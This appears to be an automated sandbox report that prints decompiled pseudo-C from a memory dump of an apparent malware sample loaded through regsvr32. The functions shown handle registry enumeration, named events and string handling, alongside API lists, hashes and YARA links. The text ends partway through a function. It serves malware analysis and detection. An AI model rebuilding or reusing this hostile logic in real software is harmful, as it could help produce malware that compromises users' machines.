Part of subcall function 00F449F5: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00F44A49

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00F4596D
wsprintfA.USER32 ref: 00F4599D

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 9876d595654a64db395b795f12da55ea65f7f8950de2b988e2f2ab08c8078c09
Instruction ID: 1a93889fab2726fe2c980bcaeb205a54740cafbc9943a281f0535563837ca4e4
Opcode Fuzzy Hash: 9876d595654a64db395b795f12da55ea65f7f8950de2b988e2f2ab08c8078c09
Instruction Fuzzy Hash: EF51E475E11619ABDB20AFA4DC85B6E3FE8AB15F20F040515ED01E7152E7B89E04BB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F47BD6, Relevance: 7.6, APIs: 5, Instructions: 95
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00F47BD6(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0xf4d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xf4d27c; // 0x47ea5a8
				_t3 = _t8 + 0xf4e862; // 0x61636f4c
				_t25 = 0;
				_t30 = E00F49111(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xf4d2a8, 1, 0, _t30);
					E00F46EF8(_t30);
				}
				_t12 =  *0xf4d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00F46F44(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E00F49E28(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E00F43D90(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x00f47bd7
0x00f47bde
0x00f47be8
0x00f47bec
0x00f47bf2
0x00f47c01
0x00f47c08
0x00f47c0c
0x00f47c1e
0x00f47c20
0x00f47c20
0x00f47c25
0x00f47c2c
0x00f47c81
0x00f47c81
0x00f47c87
0x00f47c89
0x00f47c89
0x00f47c93
0x00f47c97
0x00f47ca9
0x00f47ca9
0x00f47cad
0x00f47cb3
0x00f47cb3
0x00000000
0x00f47c3c
0x00f47c3c
0x00f47c43
0x00000000
0x00000000
0x00f47c4a
0x00f47c52
0x00f47c54
0x00f47c58
0x00f47c58
0x00f47c60
0x00f47c65
0x00f47c69
0x00f47c6d
0x00f47cc2
0x00f47cc8
0x00f47cc8
0x00f47c7b
0x00f47c7f
0x00f47cb6
0x00f47cb8
0x00f47cbb
0x00f47cbb
0x00000000
0x00f47cb8
0x00f47c7f
0x00000000
0x00f47c69

APIs

Part of subcall function 00F49111: lstrlen.KERNEL32(00F459DA,00000000,00000000,00000027,00000005,00000000,00000000,00F493BE,74666F53,00000000,00F459DA,00F4D00C,?,00F459DA), ref: 00F49147
Part of subcall function 00F49111: lstrcpy.KERNEL32(00000000,00000000), ref: 00F4916B
Part of subcall function 00F49111: lstrcat.KERNEL32(00000000,00000000), ref: 00F49173

CreateEventA.KERNEL32(00F4D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00F437EB,?,00000001,?), ref: 00F47C17

Part of subcall function 00F46EF8: RtlFreeHeap.NTDLL(00000000,00000000,00F44499,00000000,?,?,00000000), ref: 00F46F04

StrChrW.SHLWAPI(00F437EB,00000020,61636F4C,00000001,00000000,00000001,?,00000000,?,00F437EB,?,00000001,?), ref: 00F47C4A
WaitForSingleObject.KERNEL32(00000000,00004E20,00F437EB,00000000,00000000,?,00000000,?,00F437EB,?,00000001,?,?,?,?,00F49F8C), ref: 00F47C75
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00F437EB,?,00000001,?), ref: 00F47CA3
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00F437EB,?,00000001,?,?,?,?,00F49F8C), ref: 00F47CBB

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 098abe9a64bbebee2d175907703ae861dbb31670b50e5691c0240a898c1a56fa
Instruction ID: df9113380c41aed89d47ed7ab8bca801c576914d06147124877189908c4c157e
Opcode Fuzzy Hash: 098abe9a64bbebee2d175907703ae861dbb31670b50e5691c0240a898c1a56fa
Instruction Fuzzy Hash: 46210732E05315ABC731BFA8ACC4A6BBBE8EF99721B050619FF41EB251D760CC017690

Uniqueness

Uniqueness Score: -1.00%

Function 00F49BFA, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E00F49BFA(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				void* _t63;
				intOrPtr _t65;
				char _t68;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t86;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0xf4d33c);
					_t97 = 0x80000002;
					L6:
					_t60 = E00F44FD8(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					_t63 = E00F41599(_t98, _t103, _t107, _t97, _t60); // executed
					if(_t63 != 0) {
						L27:
						E00F46EF8(_a8);
						goto L29;
					}
					_t65 =  *0xf4d27c; // 0x47ea5a8
					_t16 = _t65 + 0xf4e8fe; // 0x65696c43
					_t68 = E00F44FD8(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d00f4c0, executed
						_t71 = E00F44B90(_t103,  *_t33, _t97, _a8,  *0xf4d334,  *((intOrPtr*)( *_t29 + 0x28))); // executed
						if(_t71 == 0) {
							_t72 =  *0xf4d27c; // 0x47ea5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0xf4ea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xf4e89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E00F4551A(_t73,  *0xf4d334,  *0xf4d338,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0xf4d27c; // 0x47ea5a8
									_t44 = _t75 + 0xf4e871; // 0x74666f53
									_t78 = E00F44FD8(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d00f4c0
										E00F470E0( *_t47, _t97, _a8,  *0xf4d338, _a24);
										_t49 = _t107 + 0x10; // 0x3d00f4c0
										E00F470E0( *_t49, _t97, _t105,  *0xf4d330, _a16);
										E00F46EF8(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d00f4c0
									E00F470E0( *_t40, _t97, _a8,  *0xf4d338, _a24);
									_t43 = _t107 + 0x10; // 0x3d00f4c0
									E00F470E0( *_t43, _t97, _a8,  *0xf4d330, _a16);
								}
								if( *_t107 != 0) {
									E00F46EF8(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d00f4c0, executed
					_t86 = E00F482C4( *_t21, _t97, _a8, _t68,  &_v16,  &_v12); // executed
					if(_t86 == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d00f4c0
							E00F44B90(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E00F46EF8(_t106);
						_t104 = _a16;
					}
					E00F46EF8(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E00F4A880(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0xf4d33c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}

0x00f49bfa
0x00f49c03
0x00f49c0a
0x00f49c0f
0x00f49c7c
0x00f49c82
0x00f49c87
0x00f49c90
0x00f49c97
0x00f49c9a
0x00f49e0e
0x00f49e15
0x00f49e15
0x00f49e1a
0x00f49e1c
0x00f49e1c
0x00f49e25
0x00f49e25
0x00f49ca0
0x00f49ca5
0x00f49cac
0x00f49e04
0x00f49e07
0x00000000
0x00f49e07
0x00f49cb2
0x00f49cb7
0x00f49cc0
0x00f49cc7
0x00f49cca
0x00f49d14
0x00f49d14
0x00f49d27
0x00f49d2a
0x00f49d31
0x00f49d39
0x00f49d3e
0x00f49d48
0x00f49d48
0x00f49d40
0x00f49d40
0x00f49d40
0x00f49d40
0x00f49d6a
0x00f49d72
0x00f49da0
0x00f49da5
0x00f49dae
0x00f49db3
0x00f49db7
0x00f49de9
0x00f49db9
0x00f49dc6
0x00f49dc9
0x00f49dd9
0x00f49ddc
0x00f49de2
0x00f49de2
0x00f49d74
0x00f49d81
0x00f49d84
0x00f49d96
0x00f49d99
0x00f49d99
0x00f49df3
0x00f49dff
0x00f49df5
0x00f49df8
0x00f49df8
0x00f49df3
0x00f49d6a
0x00000000
0x00f49d31
0x00f49cd9
0x00f49cdc
0x00f49ce3
0x00f49ce5
0x00f49cea
0x00f49cee
0x00f49cf0
0x00f49cfb
0x00f49cfe
0x00f49cfe
0x00f49d04
0x00f49d09
0x00f49d09
0x00f49d0f
0x00000000
0x00f49d0f
0x00f49c14
0x00000000
0x00f49c3b
0x00f49c3b
0x00f49c47
0x00f49c5a
0x00f49c60
0x00f49c68
0x00000000
0x00f49c68

APIs

StrChrA.SHLWAPI(00F437CC,0000005F,00000000,00000000,00000104), ref: 00F49C2D
lstrcpy.KERNEL32(?,?), ref: 00F49C5A

Part of subcall function 00F44FD8: lstrlen.KERNEL32(?,00000000,00F4D330,00000001,00F44231,00F4D00C,00F4D00C,00000000,00000005,00000000,00000000,?,?,?,00F493A5,00F459DA), ref: 00F44FE1
Part of subcall function 00F44FD8: mbstowcs.NTDLL ref: 00F45008
Part of subcall function 00F44FD8: memset.NTDLL ref: 00F4501A

Part of subcall function 00F470E0: lstrlenW.KERNEL32(00F437CC,?,?,00F49DCE,3D00F4C0,80000002,00F437CC,00F48C69,74666F53,4D4C4B48,00F48C69,?,3D00F4C0,80000002,00F437CC,?), ref: 00F47100

Part of subcall function 00F46EF8: RtlFreeHeap.NTDLL(00000000,00000000,00F44499,00000000,?,?,00000000), ref: 00F46F04

lstrcpy.KERNEL32(?,00000000), ref: 00F49C7C

Strings

\, xrefs: 00F49C60

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: \
API String ID: 3924217599-2967466578
Opcode ID: f7a440a2156da99c76f073bf190038a22e3008f407af18e81ad805ef6e6e9d3b
Instruction ID: 0ee0652c3034c105da73396a08445c82841cb594fa9d3c22dd45ddac6c4ca6b5
Opcode Fuzzy Hash: f7a440a2156da99c76f073bf190038a22e3008f407af18e81ad805ef6e6e9d3b
Instruction Fuzzy Hash: 33516976A0420AAFCF21EFA0CD41EAB3BB9FB19310F108414FE1592121E775E925FB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F484F5, Relevance: 6.1, APIs: 4, Instructions: 98
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(80000002), ref: 00F4854C
SysAllocString.OLEAUT32(00F49CAA), ref: 00F4858F
SysFreeString.OLEAUT32(00000000), ref: 00F485A3
SysFreeString.OLEAUT32(00000000), ref: 00F485B1

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: cf0a6247b691a80d66f6ec500e8006cd8171aece2a65394232ca0f3e5ee83d02
Instruction ID: abe569f664e3b4eaf30200efffea33b6eb9bb6b8b69dd41932517063f54b2a58
Opcode Fuzzy Hash: cf0a6247b691a80d66f6ec500e8006cd8171aece2a65394232ca0f3e5ee83d02
Instruction Fuzzy Hash: B1313DB6900109EFCB05DF98C8C48AE7FB5BF58350B14842EF90AD7210DB759A46EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F48B9C, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00F48B9C(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E00F43727(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E00F46EF8(_v28);
							goto L17;
						}
						_t42 = E00F49BFA(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E00F46EF8(_v24);
						_v20 = _v16;
						_t47 = E00F43727(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0xf4d26c, 0) == 0x102);
				goto L16;
			}

0x00f48b9c
0x00f48bb6
0x00f48bb9
0x00f48bbc
0x00f48bbf
0x00f48bc2
0x00f48bc8
0x00f48bcc
0x00f48ca6
0x00f48caa
0x00f48caa
0x00f48bd5
0x00f48bdc
0x00f48be3
0x00f48be6
0x00f48c9b
0x00f48c9e
0x00000000
0x00f48ca4
0x00f48bec
0x00f48bef
0x00f48bf6
0x00f48c00
0x00f48c09
0x00f48c0f
0x00f48c17
0x00f48c4f
0x00f48c89
0x00f48c8f
0x00f48c91
0x00f48c91
0x00f48c93
0x00f48c96
0x00000000
0x00f48c96
0x00f48c64
0x00f48c69
0x00f48c6d
0x00000000
0x00000000
0x00000000
0x00f48c6d
0x00f48c1c
0x00f48c2b
0x00000000
0x00000000
0x00f48c30
0x00f48c39
0x00f48c3c
0x00f48c43
0x00f48c46
0x00f48c21
0x00f48c21
0x00000000
0x00f48c21
0x00f48c4a
0x00000000
0x00f48c4a
0x00f48c1e
0x00000000
0x00f48c6f
0x00f48c7c
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00F437CC,?), ref: 00F48BC2

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

RegEnumKeyExA.KERNELBASE(?,?,?,00F437CC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00F437CC), ref: 00F48C09
WaitForSingleObject.KERNEL32(00000000,?,?,?,00F437CC,?,00F437CC,?,?,?,?,?,00F437CC,?), ref: 00F48C76
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00F437CC,?,?,?,?,00F49F8C,?,00000001), ref: 00F48C9E

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: e762f6c4663c16502bf2452351a408146f43ae5fc96a16e4b6d16ac8614a44eb
Instruction ID: dd6c0f539798f9c706d33759cc3c623586d01c18563bda58713bf5a7bae3293d
Opcode Fuzzy Hash: e762f6c4663c16502bf2452351a408146f43ae5fc96a16e4b6d16ac8614a44eb
Instruction Fuzzy Hash: E8314176D01119EFCF21AF99DC849EEFFB9EF55390F104066EA11B2160D7744A41ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F4373C, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00F4373C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E00F486A5(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E00F47123(_t23);
						}
					}
					return _t38;
				}
				_t26 = E00F4473F(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xf4d2a8, 1, 0,  *0xf4d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					FindCloseChangeNotification(_t40); // executed
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00F48B9C(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00F49BFA(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00F4A50C(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00F47BD6( &_v32, _t39);
					goto L13;
				}
			}

0x00f4373c
0x00f43749
0x00f4374f
0x00f43750
0x00f43751
0x00f43752
0x00f43753
0x00f43757
0x00f4375e
0x00f43763
0x00f43767
0x00f437ef
0x00f437ef
0x00f437f2
0x00f437f4
0x00f437fc
0x00f437fc
0x00f43802
0x00f43805
0x00f43805
0x00f43802
0x00f43810
0x00f43810
0x00f43773
0x00f4377a
0x00f4377c
0x00f4377c
0x00f43793
0x00f43797
0x00f4379a
0x00f437a5
0x00f437ac
0x00f437ac
0x00f437b8
0x00f437b9
0x00f437c7
0x00f437bb
0x00f437bb
0x00f437bc
0x00f437bd
0x00f437be
0x00f437bf
0x00f437c0
0x00f437c0
0x00f437cc
0x00f437d1
0x00f437d3
0x00f437d5
0x00f437d5
0x00f437dc
0x00000000
0x00f437de
0x00f437de
0x00f437eb
0x00000000
0x00f437eb

APIs

CreateEventA.KERNEL32(00F4D2A8,00000001,00000000,00000040,00000001,?,73BCF710,00000000,73BCF730,?,?,?,00F49F8C,?,00000001,?), ref: 00F4378D
SetEvent.KERNEL32(00000000,?,?,?,00F49F8C,?,00000001,?,00000002,?,?,00F45A08,?), ref: 00F4379A
Sleep.KERNELBASE(00000BB8,?,?,?,00F49F8C,?,00000001,?,00000002,?,?,00F45A08,?), ref: 00F437A5
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,00F49F8C,?,00000001,?,00000002,?,?,00F45A08,?), ref: 00F437AC

Part of subcall function 00F48B9C: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00F437CC,?), ref: 00F48BC2
Part of subcall function 00F48B9C: RegEnumKeyExA.KERNELBASE(?,?,?,00F437CC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00F437CC), ref: 00F48C09
Part of subcall function 00F48B9C: WaitForSingleObject.KERNEL32(00000000,?,?,?,00F437CC,?,00F437CC,?,?,?,?,?,00F437CC,?), ref: 00F48C76
Part of subcall function 00F48B9C: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00F437CC,?,?,?,?,00F49F8C,?,00000001), ref: 00F48C9E

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
String ID:
API String ID: 780868161-0
Opcode ID: 9089e001d57f1a92f12a7efdd24b6da2efa55b81bf094f4efbf9596b3cb5c3e4
Instruction ID: 308a55482f42ae2e45d69710cb1e15ce9966cd42336cfd8b87a133ecf4c51cfc
Opcode Fuzzy Hash: 9089e001d57f1a92f12a7efdd24b6da2efa55b81bf094f4efbf9596b3cb5c3e4
Instruction Fuzzy Hash: BD21C8B7D04118ABCB10BFE48C8189EBF79EB45360B014025FE41E3140EB78DE41A7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F48436, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00F48436(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00F43727(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16); // executed
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00f48442
0x00f48446
0x00f48447
0x00f48448
0x00f4844a
0x00f4844c
0x00f48451
0x00f48454
0x00f484eb
0x00f484f2
0x00f484f2
0x00f4845d
0x00f48464
0x00f48474
0x00f48474
0x00f4847a
0x00f4847c
0x00f48481
0x00f4848a
0x00f48492
0x00f48495
0x00f484a0
0x00f484a4
0x00f484a6
0x00f484a7
0x00f484b0
0x00f484b4
0x00f484c5
0x00f484b6
0x00f484bb
0x00f484c0
0x00f484cf
0x00f484cf
0x00f484a4
0x00f484d5
0x00f484db
0x00f484db
0x00f484e4
0x00f484e9
0x00f484e9
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00F48464
lstrlenW.KERNEL32(?), ref: 00F4849A
memcpy.NTDLL(00000000,?,?,?), ref: 00F484BB
SysFreeString.OLEAUT32(?), ref: 00F484CF

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: ca25260210623659c7d2263901505a0451e2fbe70b5aac74d85de5667c0978b4
Instruction ID: 5ca2b06b68533cf5ebe96040bf4384a0f32f52a9f14ac79d03f9cdc726e74848
Opcode Fuzzy Hash: ca25260210623659c7d2263901505a0451e2fbe70b5aac74d85de5667c0978b4
Instruction Fuzzy Hash: 88214175A0120AEFCB10DFA8C88499EBFB8FF49350B1081A9ED46E7210EB34DA45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F49A54, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F49A54(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
